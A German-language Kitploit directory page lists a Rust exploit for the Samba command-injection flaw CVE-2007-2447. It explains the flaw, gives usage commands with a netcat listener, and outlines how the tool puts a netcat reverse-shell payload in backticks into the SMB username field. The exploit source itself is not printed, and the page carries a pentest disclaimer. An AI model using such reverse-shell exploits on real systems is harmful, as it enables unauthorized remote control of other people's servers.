Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2007-2447 — Eine eigenständige Rust-Implementierung des CVE-2007-2447-Exploits, der auf Samba smbd 3.0.20-Debian abzielt. | Kitploit
Tools/GitHubGitHub/nika0x38/cve-2007-2447
SchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-ToolPayload-Entwicklung
GitHubnika0x38/cve-2007-2447

CVE-2007-2447

Eine eigenständige Rust-Implementierung des CVE-2007-2447-Exploits, der auf Samba smbd 3.0.20-Debian abzielt.

Repository anzeigen
1vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2007-2447 Samba-Exploit

Rust Security

Eine eigenständige Rust-Implementierung des CVE-2007-2447-Exploits, der auf Samba smbd 3.0.20-Debian abzielt.

Beschreibung der Sicherheitslücke

CVE-2007-2447 ist eine Befehlseinschleusungssicherheitslücke in Samba-Versionen 3.0.0 bis 3.0.25rc3. Die Schwachstelle besteht in der Funktion SamrChangePassword(), die Benutzereingaben nicht ordnungsgemäß bereinigt, sodass Angreifer über Shell-Metazeichen im Benutzernamenfeld während der SMB-Authentifizierung beliebige Befehle ausführen können.

Voraussetzungen

  • Rust auf Ihrem System installiert
  • Ziel, das eine anfällige Samba-Version ausführt
  • Ziel muss netcat verfügbar haben (normalerweise standardmäßig installiert)

Verwendung

root@kitploit:~
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>

Beispiel

root@kitploit:~
# Netcat-Listener einrichten
nc -lvnp 4444

# Exploit ausführen
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100

Optionen

  • --lhost: IP-Adresse Ihres Angriffsrechners
  • --lport: Port zum Empfangen der Reverse-Shell-Verbindung
  • --target: IP-Adresse des Zielrechners

Funktionsweise

  1. Generiert einen Netcat-Reverse-Shell-Payload direkt im Code
  2. Injiziert den Payload mit Backticks in das SMB-Benutzernamenfeld
  3. Sendet eine fehlerhafte SMB-Session-Setup-Anfrage an Port 445
  4. Nutzt die Befehlseinschleusung in Sambas Benutzernamenverarbeitung aus
  5. Führt den Reverse-Shell-Payload auf dem Ziel aus

Funktionen

  • Eigenständig: Keine externen Abhängigkeiten wie Metasploit erforderlich
  • Portabel: Funktioniert auf jedem System mit installiertem Rust
  • Schnell: Kein Erzeugen externer Prozesse

Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungszwecken und autorisierten Penetrationstests. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche Genehmigung haben

Tool herunterladen